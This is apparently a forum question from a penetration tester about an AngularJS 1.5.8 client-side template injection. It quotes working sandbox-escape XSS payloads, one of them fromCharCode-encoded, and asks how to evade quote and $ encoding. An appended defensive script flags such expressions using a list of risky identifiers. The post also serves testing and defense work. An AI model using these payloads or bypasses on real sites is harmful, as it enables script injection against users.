penetration test – Angular Expression/XSS-Payload without Quotes or “$”

I am really trying hard to exploit a Client Side Template Injection vulnerability in a webapp I am currently pentesting. I'm so close to getting the payload to be executed, but I am stuck at the last little part^^. Would be great if you could help me out here.

I am able to inject a whole AngularJS expression into the HTML code of the server response. It's a hidden input field and the value is the Angular expression. We are talking about Angular 1.5.8 and I already found a payload which is working with this version:

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

Now the problem is that I can't use quotes as they get output encoded, and I also can't use the $ sign. It also gets output encoded, as I noticed with my last try. My last idea, which was working in JSFiddle, was this payload:

{{$eval(x = valueOf.name.constructor.fromCharCode(120,32,61,32,123,39,121,39,58,39,39,46,99,111,110,115,116,114,117,99,116,111,114,46,112,114,111,116,111,116,121,112,101,125,59,32,120,91,39,121,39,93,46,99,104,97,114,65,116,61,91,93,46,106,111,105,110,59,36,101,118,97,108,40,39,120,61,97,108,101,114,116,40,49,41,39,41,59))}}

I don't know Angular very well, so if anybody can think of a way I could write the payload at the top without quotes or $ signs, it would be really great and you would help me a lot^^. I just want to get it to work xD The perfect way to test it is JSFiddle (http://jsfiddle.net/2zs2yv7o/6/, this is for 1.4.6 but you can just change it). You just need to set it to Angular 1.5.8 🙂

Thanks in advance and best regards!
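
A defender-side view of the reflection described above, as an added example that is not part of the original post: a server-side check that flags request parameters carrying AngularJS interpolation markers before they are reflected into a template, even when the braces arrive URL-encoded or as HTML entities. The names `inspectParam`, `decodeLayers` and `RISKY_TOKENS` are hypothetical, the default `{{ }}` delimiters are assumed, and the sample inputs in the usage are constructed.

```javascript
// Added example (not from the post): flag parameters that contain AngularJS
// 1.x interpolation markers, looking through URL and HTML-entity encoding.

// Identifiers taken from the payloads quoted in the post; they build strings
// or reach object internals without needing quote characters.
const RISKY_TOKENS = ['constructor', 'fromCharCode', '$eval', 'prototype', 'valueOf'];
const NAMED = { lbrace: '{', rbrace: '}', lcub: '{', rcub: '}', dollar: '$' };

function fromCode(n, original) {
  // Out-of-range code points are left untouched instead of throwing.
  return Number.isInteger(n) && n >= 0 && n <= 0x10ffff ? String.fromCodePoint(n) : original;
}

// The browser decodes character references in attribute values before
// AngularJS compiles the DOM, so entity-encoded braces are still live.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (m, h) => fromCode(parseInt(h, 16), m))
    .replace(/&#(\d+);?/g, (m, d) => fromCode(Number(d), m))
    .replace(/&([a-z]+);/gi, (m, n) => NAMED[n.toLowerCase()] ?? m);
}

// Peel up to maxRounds layers of URL and entity encoding (handles double encoding).
function decodeLayers(raw, maxRounds = 3) {
  let cur = String(raw);
  for (let i = 0; i < maxRounds; i++) {
    let next = cur;
    try { next = decodeURIComponent(cur); } catch { /* malformed %: keep as is */ }
    next = decodeEntities(next);
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// verdict: 'clean' (no expression), 'review' (expression present),
// 'block' (expression uses one of the risky identifiers).
function inspectParam(raw) {
  const value = decodeLayers(raw);
  const expressions = [...value.matchAll(/\{\{([\s\S]*?)\}\}/g)].map(m => m[1]);
  const tokens = RISKY_TOKENS.filter(t => expressions.some(e => e.includes(t)));
  const verdict = expressions.length === 0 ? 'clean' : tokens.length ? 'block' : 'review';
  return { verdict, tokens };
}

// Constructed sample inputs
console.log(inspectParam('hello world'));
console.log(inspectParam('%7B%7BvalueOf.name.constructor.fromCharCode(97)%7D%7D'));
```

A check like this is a detection aid only; the durable fix is to keep user input out of any element AngularJS compiles, for example by rendering it inside an `ng-non-bindable` container.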